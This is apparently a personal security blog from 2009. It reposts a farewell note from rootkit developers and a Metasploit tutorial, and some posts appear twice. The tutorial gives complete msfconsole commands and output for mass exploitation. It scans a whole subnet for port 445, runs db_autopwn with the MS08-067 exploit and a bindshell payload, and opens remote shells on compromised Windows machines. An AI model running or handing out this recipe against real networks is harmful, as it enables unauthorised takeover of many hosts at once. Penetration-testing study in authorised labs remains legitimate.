To study course CEH need:
+ Share, discuss
+ Understand about malware
+ Understand about network system
+ Understand about network services
- Ports
- DNS, DHCP, DHCP Relay Agent, NAT, Port forwarding
- ACL
- Authentication (token, radius, LDAP)
- Find vulnerability
- Remember hacker process
Thanks VuongTrungThang about this methodology
Knowledge base!
Thursday, October 22, 2009
Wednesday, October 21, 2009
Thanks for EP_X0FF
To EP_X0FF
I know you is a expert about Rootkits. I like idea of you. I will try to learn about VR/RK, networking and Secure. Thanks
And I want copy article in your blog.
On the way to Microsoft
I was too busy during these two months to write something here or on forums. But as you can predict currently I have enough time to write some news ;) First we have finally deal with all problems and now our little collective is on the way to Microsoft. That is not a joke :) Since beginning of the 2007 we have a lot of contacts with Microsoft participants from the dev team. They were a really interested in our projects (at this time it was a Rootkit Unhooker and test rootkit Unreal) and they give to us opportunity to join their team. But all what we done this two year was a part of our big project called Secured Eye (SEye), in a two words this is project mix of software/hardware related to distributed calculations and virtualization technologies based on Vanderpool / Pacifica extensions. Not a Blue Pill. To be more correct some parts of SEye can be used as a pill for any kind of Blue Pill variations ;) Currently our collective is partially migrating to Wittenberg located in Germany where we will end our works on SEye. As you can guess all our source code and concept were sold to MS. This was happened in the beginning of November and includes all variants of our test programs, RkU, including last 4.1 version and SEye which is ready on 3/4. But this doesn’t mean that any kind of this code / technology will be used by corporation in near future in commercial products. More likely that no. Just remember - virtualization is a key to future.
Finally I want to greet all peoples who helped us in our little RK/ARK “Invisible War” during last two years, war which is successfully come to a logical end.
Greg Hoglund (thanks for the roots)
Joanna Rutkowska (you have given us a target)
Holy Father (hxdef master)
Authors of the BOOTKIT (you cool)
Mark Russinovich (great book and great tools)
Cardmagic and wowocock (thank you guys for your tool and ideas)
Gmer (buddy, no matter what was between us, thank you for your gmer)
Fyyre (you have known us at the same starting!)
Ms-Rem (he knows for what)
j0ker (for icq sessions, money is not everything in the life, but of course awesome part)
PJF (for making IceSword all these years)
EASTER (for the outstanding support, we will not forget)
SpannerITWks (for the RK/ARK challenge and support)
fcukdat (for providing us wonderful malware samples)
Elite (for support and understanding)
saso (being with us even after KAV stories)
steo (for supporting RkU)
Zhadum (your polymorphic engines was great)
Ratter (for reversing Unreal)
Bruno Eduardo (for wonderful translations of RkU)
Mixel (for support and translations)
FlowerCode (for support and translations)
firabc (you was with us during all this crazy years)
Error_Log (you should be more independent, especially from your new friend)
Twister (real bughunter of our RkU 3x)
n0name (for several ideas)
Cr4sh (for supporting us in some situations)
sww (using your company AVs since 1994 till now)
tnt17 (for supporting us)
ad_13 (for support us, your thanks will be transferred)
+ all who I forgotten to list
In the end I would like to say personal “no thanks” to the several members of the Russian-speaking shitty virusinfo.info conference and some other idiots from different places. Your waning minds was and is too weak to understand something ;)
Source: https://www.rootkit.com/blog.php?newsid=830
Once Again! I wanna say: Thank you!
I know you is a expert about Rootkits. I like idea of you. I will try to learn about VR/RK, networking and Secure. Thanks
And I want copy article in your blog.
On the way to Microsoft
I was too busy during these two months to write something here or on forums. But as you can predict currently I have enough time to write some news ;) First we have finally deal with all problems and now our little collective is on the way to Microsoft. That is not a joke :) Since beginning of the 2007 we have a lot of contacts with Microsoft participants from the dev team. They were a really interested in our projects (at this time it was a Rootkit Unhooker and test rootkit Unreal) and they give to us opportunity to join their team. But all what we done this two year was a part of our big project called Secured Eye (SEye), in a two words this is project mix of software/hardware related to distributed calculations and virtualization technologies based on Vanderpool / Pacifica extensions. Not a Blue Pill. To be more correct some parts of SEye can be used as a pill for any kind of Blue Pill variations ;) Currently our collective is partially migrating to Wittenberg located in Germany where we will end our works on SEye. As you can guess all our source code and concept were sold to MS. This was happened in the beginning of November and includes all variants of our test programs, RkU, including last 4.1 version and SEye which is ready on 3/4. But this doesn’t mean that any kind of this code / technology will be used by corporation in near future in commercial products. More likely that no. Just remember - virtualization is a key to future.
Finally I want to greet all peoples who helped us in our little RK/ARK “Invisible War” during last two years, war which is successfully come to a logical end.
Greg Hoglund (thanks for the roots)
Joanna Rutkowska (you have given us a target)
Holy Father (hxdef master)
Authors of the BOOTKIT (you cool)
Mark Russinovich (great book and great tools)
Cardmagic and wowocock (thank you guys for your tool and ideas)
Gmer (buddy, no matter what was between us, thank you for your gmer)
Fyyre (you have known us at the same starting!)
Ms-Rem (he knows for what)
j0ker (for icq sessions, money is not everything in the life, but of course awesome part)
PJF (for making IceSword all these years)
EASTER (for the outstanding support, we will not forget)
SpannerITWks (for the RK/ARK challenge and support)
fcukdat (for providing us wonderful malware samples)
Elite (for support and understanding)
saso (being with us even after KAV stories)
steo (for supporting RkU)
Zhadum (your polymorphic engines was great)
Ratter (for reversing Unreal)
Bruno Eduardo (for wonderful translations of RkU)
Mixel (for support and translations)
FlowerCode (for support and translations)
firabc (you was with us during all this crazy years)
Error_Log (you should be more independent, especially from your new friend)
Twister (real bughunter of our RkU 3x)
n0name (for several ideas)
Cr4sh (for supporting us in some situations)
sww (using your company AVs since 1994 till now)
tnt17 (for supporting us)
ad_13 (for support us, your thanks will be transferred)
+ all who I forgotten to list
In the end I would like to say personal “no thanks” to the several members of the Russian-speaking shitty virusinfo.info conference and some other idiots from different places. Your waning minds was and is too weak to understand something ;)
Source: https://www.rootkit.com/blog.php?newsid=830
Once Again! I wanna say: Thank you!
Wednesday, October 7, 2009
Metasploit Mass Exploitation for Dummy
One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.
To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Source: http://blog.metasploit.com/2009/02/metasploit-mass-exploitation-for.html
Maybe! This Article only is basic. But let's trying
Subscribe to:
Posts (Atom)